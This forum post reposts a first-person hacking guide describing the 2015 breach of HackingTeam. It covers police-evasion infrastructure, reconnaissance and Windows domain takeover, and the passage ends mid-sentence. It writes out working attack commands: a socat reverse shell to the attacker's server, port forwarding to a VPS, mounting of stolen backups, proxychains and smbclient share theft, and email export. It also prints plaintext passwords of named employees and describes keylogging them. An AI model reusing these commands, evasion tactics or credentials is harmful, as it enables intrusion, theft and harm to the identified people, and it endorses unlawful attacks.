[Tutorial] The hacking incident involving HackingTeam
by RansomGirl - Monday January 27, 2025 at 06:57 PM
#1
The hacking incident involving HackingTeam, an Italian spyware firm, transpired in July 2015 and showcased one of the most high-profile breaches in the cybersecurity world. 
Here’s a detailed explanation of how it happened:

                _  _            _      ____            _    _               | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |               | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |               |  _  | (_| | (__|  <  | |_) | (_| | (__|  <|_|               |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)                                                                                   A DIY Guide                                 ,-._,-._                                          _,-\  o O_/;                                        / ,  `    `|                                        | \-.,___,  /  `                                      \ `-.__/  /    ,.\                                  / `-.__.-\`  ./  \'                             / /|    ___\ ,/      `\                           ( ( |.-"`  '/\        \  `                             \ \/      ,,  |          \ _                             \|    o/o  /          \.                               \        , /            /                               ( __`;-;'__`)            \\                               `//'`  `||`              `\                             _//      ||          __  _  _ _____  __                     .-"-._,(__)    .(__).-""-.      | | | | |_  _| |                     /          \    /          \    | | |_| | | |  |                     \          /    \          /    | |  _  | | |  |                     `'-------`      `--------'`    __| |_| |_| |_|  |__                               #antisec --[ 1 - Introduction ]---------------------------------------------------------- You'll notice the change in language since the last edition [1]. The English-speaking world already has tons of books, talks, guides, and info about hacking. In that world, there's plenty of hackers better than me, but they misuse their talents working for "defense" contractors, for intelligence agencies, to protect banks and corporations, and to defend the status quo. Hacker culture was born in the US as a counterculture, but that origin only remains in its aesthetics - the rest has been assimilated. At least they can wear a t-shirt, dye their hair blue, use their hacker names, and feel like rebels while they work for the Man. You used to have to sneak into offices to leak documents [2]. You used to need a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4]. Like the CNT said after the Gamma Group hack: "Let's take a step forward with new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight! [1] http://pastebin.com/raw.php?i=cRYvK4jb [2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI [3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html [4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf [5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group --[ 2 - Hacking Team ]---------------------------------------------------------- Hacking Team was a company that helped governments hack and spy on journalists, activists, political opposition, and other threats to their power [1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende RCS". They also claimed to have technology to solve the "problem" posed by Tor and the darknet [13]. But seeing as I'm still free, I have my doubts about its effectiveness. [1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/ [2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html [3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/ [4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/ [5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/ [6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/ [7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/ [8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal [9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/ [10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/ [11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/ [12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html [13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web --[ 3 - Stay safe out there ]--------------------------------------------------- Unfortunately, our world is backwards. You get rich by doing bad things and go to jail for doing good. Fortunately, thanks to the hard work of people like the Tor project [1], you can avoid going to jail by taking a few simple precautions: 1) Encrypt your hard disk [2]   I guess when the police arrive to seize your computer, it means you've   already made a lot of mistakes, but it's better to be safe. 2) Use a virtual machine with all traffic routed through Tor   This accomplishes two things. First, all your traffic is anonymized through   Tor. Second, keeping your personal life and your hacking on separate   computers helps you not to mix them by accident.   You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or   something custom [6]. Here's [7] a detailed comparison. 3) (Optional) Don't connect directly to Tor     Tor isn't a panacea. They can correlate the times you're connected to Tor   with the times your hacker handle is active. Also, there have been   successful attacks against Tor [8]. You can connect to Tor using other   peoples' wifi. Wifislax [9] is a linux distro with a lot of tools for   cracking wifi. Another option is to connect to a VPN or a bridge node [10]   before Tor, but that's less secure because they can still correlate the   hacker's activity with your house's internet activity (this was used as   evidence against Jeremy Hammond [11]).   The reality is that while Tor isn't perfect, it works quite well. When I   was young and reckless, I did plenty of stuff without any protection (I'm   referring to hacking) apart from Tor, that the police tried their hardest   to investigate, and I've never had any problems. [1] https://www.torproject.org/ [2] https://info.securityinabox.org/es/chapter-4 [3] https://www.whonix.org/ [4] https://tails.boum.org/ [5] https://www.qubes-os.org/doc/privacy/torvm/ [6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy [7] https://www.whonix.org/wiki/Comparison_with_Others [8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/ [9] http://www.wifislax.com/ [10] https://www.torproject.org/docs/bridges.html.en [11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html ----[ 3.1 - Infrastructure ]---------------------------------------------------- I don't hack directly from Tor exit nodes. They're on blacklists, they're slow, and they can't receive connect-backs. Tor protects my anonymity while I connect to the infrastructure I use to hack, which consists of: 1) Domain Names   For C&C addresses, and for DNS tunnels for guaranteed egress. 2) Stable Servers   For use as C&C servers, to receive connect-back shells, to launch attacks,   and to store the loot. 3) Hacked Servers   For use as pivots to hide the IP addresses of the stable servers. And for   when I want a fast connection without pivoting, for example to scan ports,   scan the whole internet, download a database with sqli, etc. Obviously, you have to use an anonymous payment method, like bitcoin (if it's used carefully). ----[ 3.2 - Attribution ]------------------------------------------------------- In the news we often see attacks traced back to government-backed hacking groups ("APTs"), because they repeatedly use the same tools, leave the same footprints, and even use the same infrastructure (domains, emails, etc). They're negligent because they can hack without legal consequences. I didn't want to make the police's work any easier by relating my hack of Hacking Team with other hacks I've done or with names I use in my day-to-day work as a blackhat hacker. So, I used new servers and domain names, registered with new emails, and payed for with new bitcoin addresses. Also, I only used tools that are publicly available, or things that I wrote specifically for this attack, and I changed my way of doing some things to not leave my usual forensic footprint. --[ 4 - Information Gathering ]------------------------------------------------- Although it can be tedious, this stage is very important, since the larger the attack surface, the easier it is to find a hole somewhere in it. ----[ 4.1 - Technical Information ]--------------------------------------------- Some tools and techniques are: 1) Google   A lot of interesting things can be found with a few well-chosen search   queries. For example, the identity of DPR [1]. The bible of Google hacking   is the book "Google Hacking for Penetration Testers". You can find a short   summary in Spanish at [2]. 2) Subdomain Enumeration   Often, a company's main website is hosted by a third party, and you'll find   the company's actual IP range thanks to subdomains like mx.company.com or   ns1.company.com. Also, sometimes there are things that shouldn't be exposed   in "hidden" subdomains. Useful tools for discovering domains and subdomains   are fierce [3], theHarvester [4], and recon-ng [5]. 3) Whois lookups and reverse lookups   With a reverse lookup using the whois information from a domain or IP range   of a company, you can find other domains and IP ranges. As far as I know,   there's no free way to do reverse lookups aside from a google "hack":     "via della moscova 13" site:www.findip-address.com   "via della moscova 13" site:domaintools.com 4) Port scanning and fingerprinting   Unlike the other techniques, this talks to the company's servers. I   include it in this section because it's not an attack, it's just   information gathering. The company's IDS might generate an alert, but you   don't have to worry since the whole internet is being scanned constantly.   For scanning, nmap [6] is precise, and can fingerprint the majority of   services discovered. For companies with very large IP ranges, zmap [7] or   masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web   sites. [1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html [2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf [3] http://ha.ckers.org/fierce/ [4] https://github.com/laramies/theHarvester [5] https://bitbucket.org/LaNMaSteR53/recon-ng [6] https://nmap.org/ [7] https://zmap.io/ [8] https://github.com/robertdavidgraham/masscan [9] http://www.morningstarsecurity.com/research/whatweb [10] http://blindelephant.sourceforge.net/ ----[ 4.2 - Social Information ]------------------------------------------------ For social engineering, it's useful to have information about the employees, their roles, contact information, operating system, browser, plugins, software, etc. Some resources are: 1) Google   Here as well, it's the most useful tool. 2) theHarvester and recon-ng   I already mentioned them in the previous section, but they have a lot more   functionality. They can find a lot of information quickly and   automatically. It's worth reading all their documentation. 3) LinkedIn   A lot of information about the employees can be found here. The company's   recruiters are the most likely to accept your connection requests. 4) Data.com   Previously known as jigsaw. They have contact information for many   employees. 5) File Metadata   A lot of information about employees and their systems can be found in   metadata of files the company has published. Useful tools for finding   files on the company's website and extracting the metadata are metagoofil   [1] and FOCA [2]. [1] https://github.com/laramies/metagoofil [2] https://www.elevenpaths.com/es/labstools/foca-2/index.html --[ 5 - Entering the network ]-------------------------------------------------- There are various ways to get a foothold. Since the method I used against Hacking Team is uncommon and a lot more work than is usually necessary, I'll talk a little about the two most common ways, which I recommend trying first. ----[ 5.1 - Social Engineering ]------------------------------------------------ Social engineering, specifically spear phishing, is responsible for the majority of hacks these days. For an introduction in Spanish, see [1]. For more information in English, see [2] (the third part, "Targeted Attacks"). For fun stories about the social engineering exploits of past generations, see [3]. I didn't want to try to spear phish Hacking Team, as their whole business is helping governments spear phish their opponents, so they'd be much more likely to recognize and investigate a spear phishing attempt. [1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html [2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/ [3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf ----[ 5.2 - Buying Access ]----------------------------------------------------- Thanks to hardworking Russians and their exploit kits, traffic sellers, and bot herders, many companies already have compromised computers in their networks. Almost all of the Fortune 500, with their huge networks, have some bots already inside. However, Hacking Team is a very small company, and most of it's employees are infosec experts, so there was a low chance that they'd already been compromised. ----[ 5.3 - Technical Exploitation ]-------------------------------------------- After the Gamma Group hack, I described a process for searching for vulnerabilities [1]. Hacking Team had one public IP range: inetnum:        93.62.139.32 - 93.62.139.47 descr:          HT public subnet Hacking Team had very little exposed to the internet. For example, unlike Gamma Group, their customer support site needed a client certificate to connect. What they had was their main website (a Joomla blog in which Joomscan [2] didn't find anything serious), a mail server, a couple routers, two VPN appliances, and a spam filtering appliance. So, I had three options: look for a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the embedded devices. A 0day in an embedded device seemed like the easiest option, and after two weeks of work reverse engineering, I got a remote root exploit. Since the vulnerabilities still haven't been patched, I won't give more details, but for more information on finding these kinds of vulnerabilities, see [3] and [4]. [1] http://pastebin.com/raw.php?i=cRYvK4jb [2] http://sourceforge.net/projects/joomscan/ [3] http://www.devttys0.com/ [4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A --[ 6 - Be Prepared ]----------------------------------------------------------- I did a lot of work and testing before using the exploit against Hacking Team. I wrote a backdoored firmware, and compiled various post-exploitation tools for the embedded device. The backdoor serves to protect the exploit. Using the exploit just once and then returning through the backdoor makes it harder to identify and patch the vulnerabilities. The post-exploitation tools that I'd prepared were: 1) busybox   For all the standard Unix utilities that the system didn't have. 2) nmap   To scan and fingerprint Hacking Team's internal network. 3) Responder.py   The most useful tool for attacking windows networks when you have access to   the internal network, but no domain user. 4) Python   To execute Responder.py 5) tcpdump   For sniffing traffic. 6) dsniff   For sniffing passwords from plaintext protocols like ftp, and for   arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR   and NaGA, but it was hard to compile it for the system. 7) socat   For a comfortable shell with a pty:   my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port   hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \   tcp:my_server:my_port   And useful for a lot more, it's a networking swiss army knife. See the   examples section of its documentation. 8) screen   Like the shell with pty, it wasn't really necessary, but I wanted to feel   at home in Hacking Team's network. 9) a SOCKS proxy server   To use with proxychains to be able to access their local network from any   program. 10) tgcd   For forwarding ports, like for the SOCKS server, through the firewall. [1] https://www.busybox.net/ [2] https://nmap.org/ [3] https://github.com/SpiderLabs/Responder [4] https://github.com/bendmorris/static-python [5] http://www.tcpdump.org/ [6] http://www.monkey.org/~dugsong/dsniff/ [7] http://www.dest-unreach.org/socat/ [8] https://www.gnu.org/software/screen/ [9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html [10] http://tgcd.sourceforge.net/ The worst thing that could happen would be for my backdoor or post-exploitation tools to make the system unstable and cause an employee to investigate. So I spent a week testing my exploit, backdoor, and post-exploitation tools in the networks of other vulnerable companies before entering Hacking Team's network. --[ 7 - Watch and Listen ]------------------------------------------------------ Now inside their internal network, I wanted to take a look around and think about my next step. I started Responder.py in analysis mode (-A to listen without sending poisoned responses), and did a slow scan with nmap. --[ 8 - NoSQL Databases ]------------------------------------------------------- NoSQL, or rather NoAuthentication, has been a huge gift to the hacker community [1]. Just when I was worried that they'd finally patched all of the authentication bypass bugs in MySQL [2][3][4][5], new databases came into style that lack authentication by design. Nmap found a few in Hacking Team's internal network: 27017/tcp open  mongodb      MongoDB 2.6.5 | mongodb-databases: |  ok = 1 |  totalSizeMb = 47547 |  totalSize = 49856643072 ... |_    version = 2.6.5 27017/tcp open  mongodb      MongoDB 2.6.5 | mongodb-databases: |  ok = 1 |  totalSizeMb = 31987 |  totalSize = 33540800512 |  databases ... |_    version = 2.6.5 They were the databases for test instances of RCS. The audio that RCS records is stored in MongoDB with GridFS. The audio folder in the torrent [6] came from this. They were spying on themselves without meaning to. [1] https://www.shodan.io/search?query=product%3Amongodb [2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql [3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html [4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c [5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html [6] https://ht.transparencytoolkit.org/audio/ --[ 9 - Crossed Cables ]-------------------------------------------------------- Although it was fun to listen to recordings and see webcam images of Hacking Team developing their malware, it wasn't very useful. Their insecure backups were the vulnerability that opened their doors. According to their documentation [1], their iSCSI devices were supposed to be on a separate network, but nmap found a few in their subnetwork 192.168.1.200/24: Nmap scan report for ht-synology.hackingteam.local (192.168.200.66) ... 3260/tcp open  iscsi? | iscsi-info: |  Target: iqn.2000-01.com.synology:ht-synology.name |    Address: 192.168.200.66:3260,0 |_    Authentication: No authentication required Nmap scan report for synology-backup.hackingteam.local (192.168.200.72) ... 3260/tcp open  iscsi? | iscsi-info: |  Target: iqn.2000-01.com.synology:synology-backup.name |    Address: 10.0.1.72:3260,0 |    Address: 192.168.200.72:3260,0 |_    Authentication: No authentication required iSCSI needs a kernel module, and it would've been difficult to compile it for the embedded system. I forwarded the port so that I could mount it from a VPS: VPS: tgcd -L -p 3260 -q 42838 Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838 VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1 Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it because it thinks its IP is 192.168.200.72 instead of 127.0.0.1 The way I solved it was: iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1 And now, after: iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login ...the device file appears! We mount it: vmfs-fuse -o ro /dev/sdb1 /mnt/tmp and find backups of various virtual machines. The Exchange server seemed like the most interesting. It was too big too download, but it was possible to mount it remotely to look for interesting files: $ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk $ fdisk -l /dev/loop0 /dev/loop0p1            2048  1258287103  629142528    7  HPFS/NTFS/exFAT so the offset is 2048 * 512 = 1048576 $ losetup -o 1048576 /dev/loop1 /dev/loop0 $ mount -o ro /dev/loop1 /mnt/exchange/ now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311 we find the hard disk of the VM, and mount it: vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/ mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1 ...and finally we've unpacked the Russian doll and can see all the files from the old Exchange server in /mnt/part1 [1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf --[ 10 - From backups to domain admin ]----------------------------------------- What interested me most in the backup was seeing if it had a password or hash that could be used to access the live server. I used pwdump, cachedump, and lsadump [1] on the registry hives. lsadump found the password to the besadmin service account: _SC_BlackBerry MDS Connection Service 0000  16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................ 0010  62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00    b.e.s.3.2.6.7.8. 0020  21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00    !.!.!........... I used proxychains [2] with the socks server on the embedded device and smbclient [3] to check the password: proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!' It worked! The password for besadmin was still valid, and a local admin. I used my proxy and metasploit's psexec_psh [4] to get a meterpreter session. Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and got a bunch of passwords, including the Domain Admin: HACKINGTEAM  BESAdmin      bes32678!!! HACKINGTEAM  Administrator  uu8dd8ndd12! HACKINGTEAM  c.pozzi        P4ssword      <---- lol great sysadmin HACKINGTEAM  m.romeo        ioLK/(90 HACKINGTEAM  l.guerra      4luc@=.= HACKINGTEAM  d.martinez    W4tudul3sp HACKINGTEAM  g.russo        GCBr0s0705! HACKINGTEAM  a.scarafile    Cd4432996111 HACKINGTEAM  r.viscardi    Ht2015! HACKINGTEAM  a.mino        A!e$$andra HACKINGTEAM  m.bettini      Ettore&Bella0314 HACKINGTEAM  m.luppi        Blackou7 HACKINGTEAM  s.gallucci    1S9i8m4o! HACKINGTEAM  d.milan        set!dob66 HACKINGTEAM  w.furlan      Blu3.B3rry! HACKINGTEAM  d.romualdi    Rd13136f@# HACKINGTEAM  l.invernizzi  L0r3nz0123! HACKINGTEAM  e.ciceri      2O2571&2E HACKINGTEAM  e.rabe        erab@4HT! [1] https://github.com/Neohapsis/creddump7 [2] http://proxychains.sourceforge.net/ [3] https://www.samba.org/ [4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf [5] https://github.com/gentilkiwi/mimikatz --[ 11 - Downloading the mail ]------------------------------------------------- With the Domain Admin password, I have access to the email, the heart of the company. Since with each step I take there's a chance of being detected, I start downloading their email before continuing to explore. Powershell makes it easy [1]. Curiously, I found a bug with Powershell's date handling. After downloading the emails, it took me another couple weeks to get access to the source code and everything else, so I returned every now and then to download the new emails. The server was Italian, with dates in the format day/month/year. I used: -ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')} with New-MailboxExportRequest to download the new emails (in this case all mail since June 5). The problem is it says the date is invalid if you try a day larger than 12 (I imagine because in the US the month comes first and you can't have a month above 12). It seems like Microsoft's engineers only test their software with their own locale. [1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/ --[ 12 - Downloading Files ]---------------------------------------------------- Now that I'd gotten Domain Admin, I started to download file shares using my proxy and the -Tc option of smbclient, for example: proxychains smbclient '//192.168.1.230/FAE DiskStation' \     -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*' I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in the torrent like that. --[ 13 - Introduction to hacking windows domains ]------------------------------ Before continuing with the story of the "weones culiaos" (Hacking Team), I should give some general knowledge for hacking windows networks. ----[ 13.1 - Lateral Movement ]------------------------------------------------- I'll give a brief review of the different techniques for spreading withing a windows network. The techniques for remote execution require the password or hash of a local admin on the target. By far, the most common way of obtaining those credentials is using mimikatz [1], especially sekurlsa::logonpasswords and sekurlsa::msv, on the computers where you already have admin access. The techniques for "in place" movement also require administrative privileges (except for runas). The most important tools for privilege escalation are PowerUp [2], and bypassuac [3]. [1] https://adsecurity.org/?page_id=1821 [2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp [3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1 Remote Movement: 1) psexec   The tried and true method for lateral movement on windows. You can use   psexec [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's   invoke_psexec [4], or the builtin windows command "sc" [5]. For the   metasploit module, powershell empire, and pth-winexe [6], you just need the   hash, not the password. It's the most universal method (it works on any   windows computer with port 445 open), but it's also the least stealthy.   Event type 7045 "Service Control Manager" will appear in the event logs. In   my experience, no one has ever noticed during a hack, but it helps the   investigators piece together what the hacker did afterwards. 2) WMI   The most stealthy method. The WMI service is enabled on all windows   computers, but except for servers, the firewall blocks it by default. You   can use wmiexec.py [7], pth-wmis [6] (here's a demonstration of wmiexec and   pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin   wmic [5]. All except wmic just need the hash. 3) PSRemoting [10]   It's disabled by default, and I don't recommend enabling new protocols.   But, if the sysadmin has already enabled it, it's very convenient,   especially if you use powershell for everything (and you should use   powershell for almost everything, it will change [11] with powershell 5 and   windows 10, but for now powershell makes it easy to do everything in RAM,   avoid AV, and leave a small footprint) 4) Scheduled Tasks   You can execute remote programs with at and schtasks [5]. It works in the   same situations where you could use psexec, and it also leaves a well known   footprint [12]. 5) GPO   If all those protocols are disabled or blocked by the firewall, once you're   Domain Admin, you can use GPO to give users a login script, install an msi,   execute a scheduled task [13], or, like we'll see with the computer of   Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and   open the firewall. [1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx [2] https://sourceforge.net/projects/winexe/ [3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh [4] http://www.powershellempire.com/?page_id=523 [5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/ [6] https://github.com/byt3bl33d3r/pth-toolkit [7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py [8] https://www.trustedsec.com/june-2015/no_psexec_needed/ [9] http://www.powershellempire.com/?page_id=124 [10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/ [11] https://adsecurity.org/?p=2277 [12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems [13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py "In place" Movement: 1) Token Stealing   Once you have admin access on a computer, you can use the tokens of the   other users to access resources in the domain. Two tools for doing this are   incognito [1] and the mimikatz token::* commands [2]. 2) MS14-068   You can take advantage of a validation bug in Kerberos to generate Domain   Admin tickets [3][4][5]. 3) Pass the Hash   If you have a user's hash, but they're not logged in, you can use   sekurlsa::pth [2] to get a ticket for the user. 4) Process Injection   Any RAT can inject itself into other processes. For example, the migrate   command in meterpreter and pupy [6], or the psinject [7] command in   powershell empire. You can inject into the process that has the token you   want. 5) runas   This is sometimes very useful since it doesn't require admin privileges.   The command is part of windows, but if you don't have a GUI you can use   powershell [8]. [1] https://www.indetectables.net/viewtopic.php?p=211165 [2] https://adsecurity.org/?page_id=1821 [3] https://github.com/bidord/pykek [4] https://adsecurity.org/?p=676 [5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html [6] https://github.com/n1nj4sec/pupy [7] http://www.powershellempire.com/?page_id=273 [8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1 ----[ 13.2 - Persistence ]------------------------------------------------------ Once you have access, you want to keep it. Really, persistence is only a challenge for assholes like Hacking Team who target activists and other individuals. To hack companies, persistence isn't needed since companies never sleep. I always use Duqu 2 style "persistence", executing in RAM on a couple high-uptime servers. On the off chance that they all reboot at the same time, I have passwords and a golden ticket [1] as backup access. You can read more about the different techniques for persistence in windows here [2][3][4]. But for hacking companies, it's not needed and it increases the risk of detection. [1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/ [2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/ [3] http://www.hexacorn.com/blog/category/autostart-persistence/ [4] https://blog.netspi.com/tag/persistence/ ----[ 13.3 - Internal reconnaissance ]------------------------------------------ The best tool these days for understanding windows networks is Powerview [1]. It's worth reading everything written by it's author [2], especially [3], [4], [5], and [6]. Powershell itself is also quite powerful [7]. As there are still many windows 2000 and 2003 servers without powershell, you also have to learn the old school [8], with programs like netview.exe [9] or the windows builtin "net view". Other techniques that I like are: 1) Downloading a list of file names   With a Domain Admin account, you can download a list of all filenames in   the network with powerview:   Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |   select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |   select fullname | out-file -append files.txt}   Later, you can read it at your leisure and choose which files to download. 2) Reading email   As we've already seen, you can download email with powershell, and it has a   lot of useful information. 3) Reading sharepoint   It's another place where many businesses store a lot of important   information. It can also be downloaded with powershell [10]. 4) Active Directory [11]   It has a lot of useful information about users and computers. Without being   Domain Admin, you can already get a lot of info with powerview and other   tools [12]. After getting Domain Admin, you should export all the AD   information with csvde or another tool. 5) Spy on the employees   One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi   (one of Hacking Team's sysadmins) gave me access to a Nagios server which   gave me access to the rete sviluppo (development network with the source   code of RCS). With a simple combination of Get-Keystrokes and   Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang   [14], and GPO, you can spy on any employee, or even on the whole domain. [1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView [2] http://www.harmj0y.net/blog/tag/powerview/ [3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/ [4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/ [5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/ [6] http://www.slideshare.net/harmj0y/i-have-the-powerview [7] https://adsecurity.org/?p=2535 [8] https://www.youtube.com/watch?v=rpwrKhgMd7E [9] https://github.com/mubix/netview [10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/ [11] https://adsecurity.org/?page_id=41 [12] http://www.darkoperator.com/?tag=Active+Directory [13] https://github.com/PowerShellMafia/PowerSploit [14] https://github.com/samratashok/nishang --[ 14 - Hunting Sysadmins ]---------------------------------------------------- Reading their documentation about their infrastructure [1], I saw that I was still missing access to something important - the "Rete Sviluppo", an isolated network with the source code for RCS. The sysadmins of a company always have access to everything, so I searched the computers of Mauro Romeo and Christian Pozzi to see how they administer the Sviluppo network, and to see if there were any other interesting systems I should investigate. It was simple to access their computers, since they were part of the windows domain where I'd already gotten admin access. Mauro Romeo's computer didn't have any ports open, so I opened the port for WMI [2] and executed meterpreter [3]. In addition to keylogging and screen scraping with Get-Keystrokes and Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1 [4], and searched for interesting files [5]. Upon seeing that Pozzi had a Truecrypt volume, I waited until he'd mounted it and then copied off the files. Many have made fun of Christian Pozzi's weak passwords (and of Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I included them in the leak as a false clue, and to laugh at him. The reality is that mimikatz and keyloggers view all passwords equally. [1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/ [2] http://www.hammer-software.com/wmigphowto.shtml [3] https://www.trustedsec.com/june-2015/no_psexec_needed/ [4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde [5] http://pwnwiki.io/#!presence/windows/find_files.md [6] http://archive.is/TbaPy [7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/ [8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt [9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/ --[ 15 - The bridge ]----------------------------------------------------------- Within Christian Pozzi's Truecrypt volume, there was a textfile with many passwords [1]. One of those was for a Fully Automated Nagios server, which had access to the Sviluppo network in order to monitor it. I'd found the bridge I needed. The textfile just had the password to the web interface, but there was a public code execution exploit [2] (it's an unauthenticated exploit, but it requires that at least one user has a session initiated, for which I used the password from the textfile). [1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt [2] http://seclists.org/fulldisclosure/2014/Oct/78 --[ 16 - Reusing and resetting passwords ]-------------------------------------- Reading the emails, I'd seen Daniele Milan granting access to git repos. I already had his windows password thanks to mimikatz. I tried it on the git server and it worked. Then I tried sudo and it worked. For the gitlab server and their twitter account, I used the "forgot my password" function along with my access to their mail server to reset the passwords. --[ 17 - Conclusion ]----------------------------------------------------------- That's all it takes to take down a company and stop their human rights abuses. That's the beauty and asymmetry of hacking: with 100 hours of work, one person can undo years of work by a multi-million dollar company. Hacking gives the underdog a chance to fight and win. Hacking guides often end with a disclaimer: this information is for educational purposes only, be an ethical hacker, don't attack systems you don't have permission to, etc. I'll say the same, but with a more rebellious conception of "ethical" hacking. Leaking documents, expropriating money from banks, and working to secure the computers of ordinary people is ethical hacking. However, most people that call themselves "ethical hackers" just work to secure those who pay their 